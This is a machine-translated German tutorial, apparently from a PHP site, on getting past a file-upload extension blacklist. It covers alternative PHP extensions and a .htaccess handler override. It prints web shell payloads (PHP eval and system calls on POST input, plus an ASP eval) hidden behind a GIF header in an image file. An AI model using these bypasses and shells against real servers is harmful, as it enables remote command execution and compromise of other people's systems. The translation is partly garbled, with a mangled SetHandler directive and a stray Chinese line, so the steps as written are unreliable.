So umgehen Sie die Blacklist beim Hochladen von Dateien

Dieser Artikel stellt hauptsächlich die Methode zum Umgehen der Blacklist durch das Hochladen von Dateien vor. Jetzt kann ich ihn mit Ihnen teilen.

Auf dieser Ebene geht es hauptsächlich um das Festlegen des Uploads Suffix. Das Einschränken von Suffixen wie ASP, PHP, JSP usw. und das Hochladen ist nicht zulässig.

Position 1: Diese Umgehungsmethode besteht darin, das Suffix in .php3, php5 usw. zu ändern. Hier ist die Blacklist-Überprüfung ('.asp', '.aspx', '.php', '.jsp') ) können wir PHP3, PHP5... und andere Suffixnamen hochladen, die vom Server analysiert werden können

Position 2: Schreiben Sie die Dateianalyseregeln neu, um sie zu umgehen

1. Laden Sie zuerst eine Datei mit dem Namen .htaccess mit folgendem Inhalt hoch:

SetHandler-Anwendung /x-httpd-php

2. 1.jpg-Skript hochladen

Inhalt:

GIF89a
<?php eval($_POST[&#39;joker&#39;]);?>
<%eval request("joker")%>
<?php system($_POST[&#39;cmd&#39;]);?>

<span   style="max-width:90%"><br/>最后查看结果如下：<br/><img src="https://img.php.cn/upload/article/000/000/009/8c177c6b99f31ac79c542a12d4053de9-3.png" alt=""/><br/></span>

Das Obige ist der gesamte Inhalt dieses Artikels. Ich hoffe, dass er für alle hilfreich ist Bitte kontaktieren Sie uns für weitere verwandte Inhalte. Folgen Sie der chinesischen PHP-Website!

Verwandte Empfehlungen:

PHP verwendet Azure Storage Blob zum Hochladen von Dateien

Einführung in das Nginx-Memcache-Caching

Das obige ist der detaillierte Inhalt vonSo umgehen Sie die Blacklist beim Hochladen von Dateien. Für weitere Informationen folgen Sie bitte anderen verwandten Artikeln auf der PHP chinesischen Website!